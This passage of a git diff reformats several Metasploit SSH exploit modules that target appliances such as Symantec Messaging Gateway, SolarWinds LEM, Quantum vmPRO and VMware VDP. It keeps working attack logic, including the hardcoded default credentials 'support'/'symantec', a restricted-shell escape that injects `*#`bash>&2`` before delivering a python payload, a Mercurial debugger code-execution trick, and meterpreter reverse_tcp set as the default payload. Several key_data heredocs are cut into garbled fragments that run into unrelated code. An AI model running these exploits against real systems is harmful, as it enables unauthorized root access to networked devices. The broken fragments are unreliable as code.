opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } opt_hash[:verbose] = :debug if datastore['SSH_DEBUG'] begin @@ -118,30 +116,30 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login("root") + conn = do_login('root') if conn - print_good "Successful login" + print_good 'Successful login' handler(conn.lsock) end end def key_data - < true, 'DefaultTarget' => 0, - 'DisclosureDate' => '2020-04-21' + 'DisclosureDate' => '2020-04-21', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -83,17 +88,11 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(user, pass) - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password', 'keyboard-interactive'], port: rport, - use_agent: false, - config: false, - password: pass, - proxy: factory, - non_interactive: true, - verify_host_key: :never - } + password: pass + }) opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 45b80a3465..750e4cb387 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -13,35 +13,43 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH def initialize(info = {}) - super(update_info(info, { - 'Name' => 'Loadbalancer.org Enterprise VA SSH Private Key Exposure', - 'Description' => %q{ - Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances - version 7.5.2 that allows passwordless authentication to any other LB Enterprise box. - Since the key is easily retrievable, an attacker can use it to gain unauthorized remote - access as root. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'Loadbalancer.org Enterprise VA SSH Private Key Exposure', + 'Description' => %q{ + Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances + version 7.5.2 that allows passwordless authentication to any other LB Enterprise box. + Since the key is easily retrievable, an attacker can use it to gain unauthorized remote + access as root. }, - }, - 'Author' => 'xistence ', # Discovery, Metasploit module - 'License' => MSF_LICENSE, - 'References' => - [ - ['PACKETSTORM', '125754'] - ], - 'DisclosureDate' => '2014-03-17', - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => 'xistence ', # Discovery, Metasploit module + 'License' => MSF_LICENSE, + 'References' => [ + ['PACKETSTORM', '125754'] + ], + 'DisclosureDate' => '2014-03-17', + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + } + ) + ) register_options( [ @@ -57,30 +65,25 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end def do_login(user) - factory = ssh_socket_factory - opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) + + opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @@ -115,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login("root") + conn = do_login('root') if conn print_good "#{rhost}:#{rport} - Successful login" handler(conn.lsock) @@ -123,21 +126,19 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < "Mercurial Custom hg-ssh Wrapper Remote Code Exec", - 'Description' => %q{ - This module takes advantage of custom hg-ssh wrapper implementations that don't - adequately validate parameters passed to the hg binary, allowing users to trigger a - Python Debugger session, which allows arbitrary Python code execution. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Mercurial Custom hg-ssh Wrapper Remote Code Exec', + 'Description' => %q{ + This module takes advantage of custom hg-ssh wrapper implementations that don't + adequately validate parameters passed to the hg binary, allowing users to trigger a + Python Debugger session, which allows arbitrary Python code execution. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'claudijd', ], - 'References' => - [ + 'References' => [ [ 'CVE', '2017-9462' ], - ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29'] + ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29'] ], - 'DefaultOptions' => - { - 'Payload' => 'python/meterpreter/reverse_tcp', + 'DefaultOptions' => { + 'Payload' => 'python/meterpreter/reverse_tcp' }, - 'Platform' => ['python'], - 'Arch' => ARCH_PYTHON, - 'Targets' => [ ['Automatic', {}] ], - 'Privileged' => false, - 'DisclosureDate' => '2017-04-18', - 'DefaultTarget' => 0 - )) + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [ ['Automatic', {}] ], + 'Privileged' => false, + 'DisclosureDate' => '2017-04-18', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + ) + ) register_options( [ @@ -72,19 +77,13 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - factory = ssh_socket_factory - ssh_options = { - :auth_methods => ['publickey'], - :config => false, - :use_agent => false, - :key_data => [ ssh_priv_key ], - :port => rport, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + ssh_options = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + key_data: [ ssh_priv_key ], + port: rport + }) - ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] print_status("#{rhost}:#{rport} - Attempting to login...") @@ -107,12 +106,12 @@ class MetasploitModule < Msf::Exploit::Remote print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end - + # rubocop:disable Lint/ShadowingOuterLocalVariable if ssh - print_good("SSH connection is established.") + print_good('SSH connection is established.') ssh.open_channel do |ch| - ch.exec "hg -R --debugger serve --stdio" do |ch, success| - ch.on_extended_data do |ch, type, data| + ch.exec 'hg -R --debugger serve --stdio' do |ch, _success| + ch.on_extended_data do |ch, _type, data| if data.match(/entering debugger/) print_good("Triggered Debugger (#{data})") ch.send_data "#{payload.encoded}\n" @@ -122,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote end end end - + # rubocop:enable Lint/ShadowingOuterLocalVariable begin ssh.loop unless session_created? rescue Errno::EBADF => e diff --git a/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb b/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb index f304362fb2..85c7a868e4 100644 --- a/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb +++ b/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb @@ -50,7 +50,12 @@ class MetasploitModule < Msf::Exploit::Remote ], 'Privileged' => false, 'DefaultTarget' => 0, - 'DisclosureDate' => '2020-09-21' + 'DisclosureDate' => '2020-09-21', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -79,17 +84,11 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(user, pass) - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password', 'keyboard-interactive'], port: rport, - use_agent: false, - config: false, - password: pass, - proxy: factory, - non_interactive: true, - verify_host_key: :never - } + password: pass + }) opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 0555e45f35..ce79add912 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -12,35 +12,43 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH def initialize(info = {}) - super(update_info(info, { - 'Name' => 'Quantum DXi V1000 SSH Private Key Exposure', - 'Description' => %q{ - Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that - allows passwordless authentication to any other DXi box. Since the key is - easily retrievable, an attacker can use it to gain unauthorized remote - access as root. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'Quantum DXi V1000 SSH Private Key Exposure', + 'Description' => %q{ + Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that + allows passwordless authentication to any other DXi box. Since the key is + easily retrievable, an attacker can use it to gain unauthorized remote + access as root. }, - }, - 'Author' => 'xistence ', # Discovery, Metasploit module - 'License' => MSF_LICENSE, - 'References' => - [ - ['PACKETSTORM', '125755'] - ], - 'DisclosureDate' => '2014-03-17', - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => 'xistence ', # Discovery, Metasploit module + 'License' => MSF_LICENSE, + 'References' => [ + ['PACKETSTORM', '125755'] + ], + 'DisclosureDate' => '2014-03-17', + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + } + ) + ) register_options( [ @@ -56,30 +64,25 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end def do_login(user) - factory = ssh_socket_factory - opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) + + opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @@ -114,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login("root") + conn = do_login('root') if conn print_good "#{rhost}:#{rport} - Successful login" handler(conn.lsock) @@ -122,21 +125,19 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < "Quantum vmPRO Backdoor Command", - 'Description' => %q{ - This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin - privileges, can get access to the restricted SSH shell. By using the hidden backdoor - "shell-escape" command it's possible to drop to a real root bash shell. This module - has been tested successfully on Quantum vmPRO 3.1.2. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Quantum vmPRO Backdoor Command', + 'Description' => %q{ + This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin + privileges, can get access to the restricted SSH shell. By using the hidden backdoor + "shell-escape" command it's possible to drop to a real root bash shell. This module + has been tested successfully on Quantum vmPRO 3.1.2. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'xistence ' # Original discovery and Metasploit module ], - 'References' => - [ + 'References' => [ ['PACKETSTORM', '125760'] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => - [ + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Quantum vmPRO 3.1.2', {}], ], - 'Privileged' => true, - 'DisclosureDate' => '2014-03-17', - 'DefaultTarget' => 0)) + 'Privileged' => true, + 'DisclosureDate' => '2014-03-17', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + ) + ) register_options( [ @@ -67,31 +71,22 @@ class MetasploitModule < Msf::Exploit::Remote ) end - def rhost datastore['RHOST'] end - def rport datastore['RPORT'] end - def do_login(user, pass) - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => true, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + password: pass + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil @@ -122,7 +117,6 @@ class MetasploitModule < Msf::Exploit::Remote return nil end - def exploit user = datastore['USER'] pass = datastore['PASS'] diff --git a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb index 7538a8b073..8ed30612fc 100644 --- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb +++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb @@ -8,37 +8,37 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "SolarWinds LEM Default SSH Password Remote Code Execution", - 'Description' => %q{ - This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH - service is accessed with the default username and password which is "cmc" and "password". By exploiting a - vulnerability that exist on the menuing script, an attacker can escape from restricted shell. + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'SolarWinds LEM Default SSH Password Remote Code Execution', + 'Description' => %q{ + This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH + service is accessed with the default username and password which is "cmc" and "password". By exploiting a + vulnerability that exist on the menuing script, an attacker can escape from restricted shell. - This module was tested against SolarWinds LEM v6.3.1. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + This module was tested against SolarWinds LEM v6.3.1. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Mehmet Ince ', # discovery & msf module ], - 'References' => - [ + 'References' => [ ['CVE', '2017-7722'], ['URL', 'http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'] ], - 'DefaultOptions' => - { - 'Payload' => 'python/meterpreter/reverse_tcp', + 'DefaultOptions' => { + 'Payload' => 'python/meterpreter/reverse_tcp' }, - 'Platform' => ['python'], - 'Arch' => ARCH_PYTHON, - 'Targets' => [ ['Automatic', {}] ], - 'Privileged' => false, - 'DisclosureDate' => '2017-03-17', - 'DefaultTarget' => 0 - )) + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [ ['Automatic', {}] ], + 'Privileged' => false, + 'DisclosureDate' => '2017-03-17', + 'DefaultTarget' => 0 + ) + ) register_options( [ @@ -73,19 +73,13 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - factory = ssh_socket_factory - opts = { - :auth_methods => ['keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => false, - :password => password, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['keyboard-interactive'], + port: rport, + password: password + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] print_status("#{rhost}:#{rport} - Attempting to login...") @@ -111,52 +105,51 @@ class MetasploitModule < Msf::Exploit::Remote if ssh payload_executed = false - print_good("SSH connection is established.") + print_good('SSH connection is established.') ssh.open_channel do |channel| - print_status("Requesting pty... We need it in order to interact with menuing system.") + print_status('Requesting pty... We need it in order to interact with menuing system.') channel.request_pty do |ch, success| - raise ::RuntimeError, "Could not request pty!" unless success - print_good("Pty successfully obtained.") + raise 'Could not request pty!' unless success - print_status("Requesting a shell.") - ch.send_channel_request("shell") do |ch, success| - raise ::RuntimeError, "Could not open shell!" unless success - print_good("Remote shell successfully obtained.") + print_good('Pty successfully obtained.') + + print_status('Requesting a shell.') + ch.send_channel_request('shell') do |_ch, success| + raise 'Could not open shell!' unless success + + print_good('Remote shell successfully obtained.') end end - channel.on_data do |ch, data| - if data.include? "cmc " - print_good("Step 1 is done. Managed to access terminal menu.") + channel.on_data do |_ch, data| + if data.include? 'cmc ' + print_good('Step 1 is done. Managed to access terminal menu.') channel.send_data("service\n") end - if data.include? "service " + if data.include? 'service ' print_good("Step 2 is done. Managed to select 'service' sub menu.") channel.send_data("restrictssh\n") end - if data.include? "Press to configure restriction on the SSH service to the Manager Appliance" + if data.include? 'Press to configure restriction on the SSH service to the Manager Appliance' print_good("Step 3 is done. Managed to start 'restrictssh' function.") channel.send_data("*#`bash>&2`\n") end - if data.include? "Are the hosts" - print_good("Step 4 is done. We are going to try escape from jail shell.") + if data.include? 'Are the hosts' + print_good('Step 4 is done. We are going to try escape from jail shell.') channel.send_data("Y\n") end - if data.include? "/usr/local/contego" - if payload_executed == false - print_good("Sweet..! Escaped from jail.") - print_status("Delivering payload...") - channel.send_data("python -c \"#{payload.encoded}\"\n") - payload_executed = true - end + if data.include? '/usr/local/contego' && (payload_executed == false) + print_good('Sweet..! Escaped from jail.') + print_status('Delivering payload...') + channel.send_data("python -c \"#{payload.encoded}\"\n") + payload_executed = true end - end end begin diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 471e5e6a96..989fde73de 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -11,50 +11,49 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability", - 'Description' => %q{ - This module exploits a default misconfiguration flaw on Symantec Messaging Gateway. - The 'support' user has a known default password, which can be used to login to the - SSH service, and gain privileged access from remote. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Stefan Viehbock', #Original discovery - 'Ben Williams', #Reporting the vuln + coordinated release - 'sinn3r' #Metasploit + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability', + 'Description' => %q{ + This module exploits a default misconfiguration flaw on Symantec Messaging Gateway. + The 'support' user has a known default password, which can be used to login to the + SSH service, and gain privileged access from remote. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Stefan Viehbock', # Original discovery + 'Ben Williams', # Reporting the vuln + coordinated release + 'sinn3r' # Metasploit ], - 'References' => - [ - ['CVE', '2012-3579'], + 'References' => [ + ['CVE', '2012-3579'], ['OSVDB', '85028'], - ['BID', '55143'], - ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] + ['BID', '55143'], + ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => - [ + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Symantec Messaging Gateway 9.5', {}], ], - 'Privileged' => true, - #Timestamp on Symantec advisory - #But was found on Jun 26, 2012 - 'DisclosureDate' => '2012-08-27', - 'DefaultTarget' => 0)) + 'Privileged' => true, + # Timestamp on Symantec advisory + # But was found on Jun 26, 2012 + 'DisclosureDate' => '2012-08-27', + 'DefaultTarget' => 0 + ) + ) register_options( [ @@ -71,31 +70,22 @@ class MetasploitModule < Msf::Exploit::Remote ) end - def rhost datastore['RHOST'] end - def rport datastore['RPORT'] end - def do_login(user, pass) - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + password: pass + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil @@ -126,7 +116,6 @@ class MetasploitModule < Msf::Exploit::Remote return nil end - def exploit user = 'support' pass = 'symantec' diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index 5c1fb86699..8062d15a5b 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -13,33 +13,36 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, { - 'Name' => 'VMware VDP Known SSH Key', - 'Description' => %q{ - VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'VMware VDP Known SSH Key', + 'Description' => %q{ + VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. }, - }, - 'Author' => ['phroxvs'], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2016-7456' ], - [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], - ], - 'DisclosureDate' => '2016-12-20', - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => ['phroxvs'], + 'License' => MSF_LICENSE, + 'References' => [ + [ 'CVE', '2016-7456' ], + [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], + ], + 'DisclosureDate' => '2016-12-20', + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0 + } + ) + ) register_options( [ @@ -55,30 +58,24 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end - def do_login() - factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies']) - opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + def do_login + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) + opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @@ -103,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote # Create a new session from the socket, then dump it. conn = Net::SSH::CommandStream.new(ssh_socket) - self.sockets.delete(ssh_socket.transport.socket) + sockets.delete(ssh_socket.transport.socket) return conn else @@ -112,28 +109,28 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login() + conn = do_login if conn - print_good "Successful login" - service_data = { + print_good 'Successful login' + service_data = { address: rhost, port: rport, protocol: 'tcp', service_name: 'ssh', - workspace_id: myworkspace_id, + workspace_id: myworkspace_id } credential_data = { username: 'admin', private_type: :ssh_key, private_data: key_data, origin_type: :service, - module_fullname: fullname, + module_fullname: fullname }.merge(service_data) core = create_credential(credential_data) login_data = { core: core, - last_attempted: Time.now, + last_attempted: Time.now }.merge(service_data) create_credential_login(login_data) @@ -142,24 +139,22 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -78,17 +83,11 @@ class MetasploitModule < Msf::Exploit::Remote end def check - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password', 'keyboard-interactive'], - port: rport, - use_agent: false, - config: false, password: password, - proxy: factory, - non_interactive: true, - verify_host_key: :never - } + port: rport + }) begin ssh = nil diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 63123aab56..e0bdcaab94 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -184,17 +184,12 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(ip, user, pass, port) - factory = ssh_socket_factory - opt_hash = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => port, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: port, + password: pass + }) opt_hash[:verbose] = :debug if datastore['SSH_DEBUG'] diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 09ac576e6f..a26bf80f64 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -11,38 +11,39 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Auxiliary::Report include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", - 'Description' => %q( - This module exploits inadequate access controls within the webUI to enable - the SSH service and change the root password. This module has been tested successfully - on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions. - ), - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Schneider Electric Pelco Endura NET55XX Encoder', + 'Description' => %q{ + This module exploits inadequate access controls within the webUI to enable + the SSH service and change the root password. This module has been tested successfully + on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Lucas Dinucci ', 'Vitor Esperança ' ], - 'References' => - [ + 'References' => [ ['CVE', '2019-6814'], ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/'] ], - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => [ [ "Universal", {} ] ], - 'Privileged' => true, - 'DisclosureDate' => '2019-01-25', - 'DefaultTarget' => 0)) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ [ 'Universal', {} ] ], + 'Privileged' => true, + 'DisclosureDate' => '2019-01-25', + 'DefaultTarget' => 0 + ) + ) register_options( [ @@ -82,34 +83,35 @@ class MetasploitModule < Msf::Exploit::Remote ''\ '' - connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) + connect_udp(true, { 'RPORT' => datastore['UDP_PORT'] }) udp_sock.put(xmlPayload) resp = [] resp << udp_sock.get(datastore['TIMEOUT']) xmlResponse = resp.join(',') disconnect_udp - if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") + if xmlResponse.include?('NET5501') || xmlResponse.include?('NET5501-I') || xmlResponse.include?('NET5501-XT') || 